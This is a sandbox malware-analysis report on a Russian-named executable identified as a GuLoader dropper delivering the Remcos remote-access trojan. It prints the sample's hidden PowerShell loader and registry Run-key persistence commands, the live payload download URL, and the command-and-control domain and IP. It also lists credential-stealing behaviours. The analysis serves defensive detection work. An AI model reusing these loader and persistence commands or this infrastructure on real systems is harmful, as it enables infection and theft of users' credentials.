Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe

Overview

General Information

Sample name:#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe
renamed because original name is a hash value
Original sample name: 130 12.04.2024 ..exe
Analysis ID:1430778
MD5:189590b2755ed6f134d8fe2c05124926
SHA1:e492eb975348e50a32c792d26441cc00912987e7
SHA256:8987f3cd89bd9f739ef4ee2495ccd81be89cf7d5f52b445c94920cfae3b0fc27
Tags:exe
Infos:

Detection

GuLoader, Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected GuLoader
Yara detected Remcos RAT
Connects to many ports of the same IP (likely port scanning)
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Machine Learning detection for sample
Maps a DLL or memory area into another process
Obfuscated command line found
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains executable resources (Code or Archives)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Dosfuscation Activity
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sleep loop found (likely to delay execution)
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • #U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe (PID: 1232 cmdline: "C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe" MD5: 189590B2755ED6F134D8FE2C05124926)
    • powershell.exe (PID: 1852 cmdline: "powershell.exe" -windowstyle hidden "$Forstbotanikkens=Get-Content 'C:\Users\user\AppData\Local\nervier\Estampede\sipunculacean\Entreprenren.Out';$Vaabentypers=$Forstbotanikkens.SubString(61389,3);.$Vaabentypers($Forstbotanikkens)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 1704 cmdline: "C:\Windows\system32\cmd.exe" /c "set /A 1^^0" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • wab.exe (PID: 7500 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • cmd.exe (PID: 7540 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "mediates" /t REG_EXPAND_SZ /d "%Linieringernes% -windowstyle minimized $Localisers=(Get-ItemProperty -Path 'HKCU:\Officialvirksomhed\').pshaws;%Linieringernes% ($Localisers)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • reg.exe (PID: 7592 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "mediates" /t REG_EXPAND_SZ /d "%Linieringernes% -windowstyle minimized $Localisers=(Get-ItemProperty -Path 'HKCU:\Officialvirksomhed\').pshaws;%Linieringernes% ($Localisers)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • wab.exe (PID: 7760 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\frrlxvvcyajmkjprpxzqdq" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 7768 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\frrlxvvcyajmkjprpxzqdq" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 7776 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\itedxngwlibzmqlvhhlsguxrsq" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 7796 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\snjwygrxzqtexwzhqsglqhsitfuae" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 7808 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\snjwygrxzqtexwzhqsglqhsitfuae" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\mqerms.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
    SourceRuleDescriptionAuthorStrings
    00000002.00000002.1656034201.00000000093F7000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      Process Memory Space: wab.exe PID: 7500JoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
        Process Memory Space: wab.exe PID: 7500JoeSecurity_RemcosYara detected Remcos RATJoe Security
          Process Memory Space: wab.exe PID: 7768JoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security

            System Summary

            barindex
            Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "mediates" /t REG_EXPAND_SZ /d "%Linieringernes% -windowstyle minimized $Localisers=(Get-ItemProperty -Path 'HKCU:\Officialvirksomhed\').pshaws;%Linieringernes% ($Localisers)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "mediates" /t REG_EXPAND_SZ /d "%Linieringernes% -windowstyle minimized $Localisers=(Get-ItemProperty -Path 'HKCU:\Officialvirksomhed\').pshaws;%Linieringernes% ($Localisers)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 7500, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "mediates" /t REG_EXPAND_SZ /d "%Linieringernes% -windowstyle minimized $Localisers=(Get-ItemProperty -Path 'HKCU:\Officialvirksomhed\').pshaws;%Linieringernes% ($Localisers)", ProcessId: 7540, ProcessName: cmd.exe
            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: %Linieringernes% -windowstyle minimized $Localisers=(Get-ItemProperty -Path 'HKCU:\Officialvirksomhed\').pshaws;%Linieringernes% ($Localisers), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 7592, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\mediates
            Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "mediates" /t REG_EXPAND_SZ /d "%Linieringernes% -windowstyle minimized $Localisers=(Get-ItemProperty -Path 'HKCU:\Officialvirksomhed\').pshaws;%Linieringernes% ($Localisers)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "mediates" /t REG_EXPAND_SZ /d "%Linieringernes% -windowstyle minimized $Localisers=(Get-ItemProperty -Path 'HKCU:\Officialvirksomhed\').pshaws;%Linieringernes% ($Localisers)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "mediates" /t REG_EXPAND_SZ /d "%Linieringernes% -windowstyle minimized $Localisers=(Get-ItemProperty -Path 'HKCU:\Officialvirksomhed\').pshaws;%Linieringernes% ($Localisers)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7540, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "mediates" /t REG_EXPAND_SZ /d "%Linieringernes% -windowstyle minimized $Localisers=(Get-ItemProperty -Path 'HKCU:\Officialvirksomhed\').pshaws;%Linieringernes% ($Localisers)", ProcessId: 7592, ProcessName: reg.exe
            Source: Process startedAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\system32\cmd.exe" /c "set /A 1^^0", CommandLine: "C:\Windows\system32\cmd.exe" /c "set /A 1^^0", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "powershell.exe" -windowstyle hidden "$Forstbotanikkens=Get-Content 'C:\Users\user\AppData\Local\nervier\Estampede\sipunculacean\Entreprenren.Out';$Vaabentypers=$Forstbotanikkens.SubString(61389,3);.$Vaabentypers($Forstbotanikkens)", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1852, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\cmd.exe" /c "set /A 1^^0", ProcessId: 1704, ProcessName: cmd.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "mediates" /t REG_EXPAND_SZ /d "%Linieringernes% -windowstyle minimized $Localisers=(Get-ItemProperty -Path 'HKCU:\Officialvirksomhed\').pshaws;%Linieringernes% ($Localisers)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "mediates" /t REG_EXPAND_SZ /d "%Linieringernes% -windowstyle minimized $Localisers=(Get-ItemProperty -Path 'HKCU:\Officialvirksomhed\').pshaws;%Linieringernes% ($Localisers)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 7500, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "mediates" /t REG_EXPAND_SZ /d "%Linieringernes% -windowstyle minimized $Localisers=(Get-ItemProperty -Path 'HKCU:\Officialvirksomhed\').pshaws;%Linieringernes% ($Localisers)", ProcessId: 7540, ProcessName: cmd.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle hidden "$Forstbotanikkens=Get-Content 'C:\Users\user\AppData\Local\nervier\Estampede\sipunculacean\Entreprenren.Out';$Vaabentypers=$Forstbotanikkens.SubString(61389,3);.$Vaabentypers($Forstbotanikkens)", CommandLine: "powershell.exe" -windowstyle hidden "$Forstbotanikkens=Get-Content 'C:\Users\user\AppData\Local\nervier\Estampede\sipunculacean\Entreprenren.Out';$Vaabentypers=$Forstbotanikkens.SubString(61389,3);.$Vaabentypers($Forstbotanikkens)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe", ParentImage: C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe, ParentProcessId: 1232, ParentProcessName: #U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Forstbotanikkens=Get-Content 'C:\Users\user\AppData\Local\nervier\Estampede\sipunculacean\Entreprenren.Out';$Vaabentypers=$Forstbotanikkens.SubString(61389,3);.$Vaabentypers($Forstbotanikkens)", ProcessId: 1852, ProcessName: powershell.exe
            Timestamp:04/24/24-07:13:18.722858
            SID:2032776
            Source Port:49713
            Destination Port:29871
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:04/24/24-07:15:39.581439
            SID:2032777
            Source Port:29871
            Destination Port:49713
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: #U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeAvira: detected
            Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
            Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
            Source: http://geoplugin.net/json.gpURL Reputation: Label: phishing
            Source: https://ricohltd.top/;Avira URL Cloud: Label: malware
            Source: https://ricohltd.top/aCqwFQDQz144.bin5Avira URL Cloud: Label: malware
            Source: https://ricohltd.top/Avira URL Cloud: Label: malware
            Source: https://ricohltd.top/aCqwFQDQz144.binAvira URL Cloud: Label: malware
            Source: learfo55ozj01.duckdns.orgVirustotal: Detection: 12%Perma Link
            Source: ricohltd.topVirustotal: Detection: 19%Perma Link
            Source: https://ricohltd.top/Virustotal: Detection: 19%Perma Link
            Source: https://ricohltd.top/aCqwFQDQz144.binVirustotal: Detection: 18%Perma Link
            Source: #U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeReversingLabs: Detection: 42%
            Source: #U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeVirustotal: Detection: 29%Perma Link
            Source: Yara matchFile source: Process Memory Space: wab.exe PID: 7500, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\mqerms.dat, type: DROPPED
            Source: #U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeJoe Sandbox ML: detected
            Source: #U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.21.60.38:443 -> 192.168.2.9:49712 version: TLS 1.2
            Source: #U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb28 source: powershell.exe, 00000002.00000002.1653002367.000000000779C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: tem.Core.pdb source: powershell.exe, 00000002.00000002.1653002367.000000000784C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000002.00000002.1648040628.00000000032BD000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdbt.Automation.pdb-2476756634-1003_Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32D source: powershell.exe, 00000002.00000002.1655544502.00000000089A8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000002.00000002.1655544502.00000000089A8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: indows\System.Core.pdbn3 source: powershell.exe, 00000002.00000002.1653002367.000000000784C000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeCode function: 0_2_00405841 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405841
            Source: C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeCode function: 0_2_00406393 FindFirstFileW,FindClose,0_2_00406393
            Source: C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_20A010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,8_2_20A010F1
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 8_2_20A06580 FindFirstFileExA,8_2_20A06580
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0040AE51 FindFirstFileW,FindNextFileW,13_2_0040AE51
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,14_2_00407EF8
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\nervier\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\nervier\Estampede\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\nervier\Estampede\sipunculacean\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior

            Networking

            barindex
            Source: TrafficSnort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.9:49713 -> 193.222.96.21:29871
            Source: TrafficSnort IDS: 2032777 ET TROJAN Remcos 3.x Unencrypted Server Response 193.222.96.21:29871 -> 192.168.2.9:49713
            Source: global trafficTCP traffic: 193.222.96.21 ports 29871,1,2,7,8,9
            Source: unknownDNS query: name: learfo55ozj01.duckdns.org
            Source: global trafficTCP traffic: 192.168.2.9:49713 -> 193.222.96.21:29871
            Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
            Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
            Source: Joe Sandbox ViewIP Address: 193.222.96.21 193.222.96.21
            Source: Joe Sandbox ViewASN Name: SWISSCOMSwisscomSwitzerlandLtdCH SWISSCOMSwisscomSwitzerlandLtdCH
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: global trafficHTTP traffic detected: GET /aCqwFQDQz144.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: ricohltd.topCache-Control: no-cache
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /aCqwFQDQz144.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: ricohltd.topCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
            Source: wab.exe, 0000000D.00000003.1715963959.0000000002F29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
            Source: wab.exe, 0000000D.00000003.1715963959.0000000002F29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
            Source: wab.exe, 00000008.00000002.3762792605.00000000209D0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.1702663924.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
            Source: wab.exe, 00000008.00000002.3762792605.00000000209D0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.1702663924.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
            Source: wab.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
            Source: wab.exe, 0000000D.00000002.1716875718.0000000002F2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: p://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
            Source: wab.exe, 0000000D.00000002.1716875718.0000000002F2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: p://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
            Source: wab.exe, 00000008.00000002.3763205114.00000000211B0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
            Source: wab.exe, 00000008.00000002.3763205114.00000000211B0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
            Source: unknownDNS traffic detected: queries for: ricohltd.top
            Source: bhvED54.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
            Source: bhvED54.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
            Source: bhvED54.tmp.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
            Source: bhvED54.tmp.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
            Source: bhvED54.tmp.13.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
            Source: wab.exe, 00000008.00000003.1698951263.0000000004E7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/1
            Source: wab.exe, 00000008.00000003.1698951263.0000000004E7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
            Source: wab.exe, 00000008.00000003.1698951263.0000000004E7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpL
            Source: wab.exe, 00000008.00000003.1717574467.0000000004E7C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3749797161.0000000004E6E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.1698951263.0000000004E7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpU
            Source: wab.exe, 00000008.00000003.1717574467.0000000004E7C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.1698951263.0000000004E7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpal
            Source: wab.exe, 00000008.00000003.1717574467.0000000004E7C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3749797161.0000000004E6E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.1698951263.0000000004E7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpe
            Source: wab.exe, 00000008.00000003.1717574467.0000000004E7C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3749797161.0000000004E6E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.1698951263.0000000004E7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gph
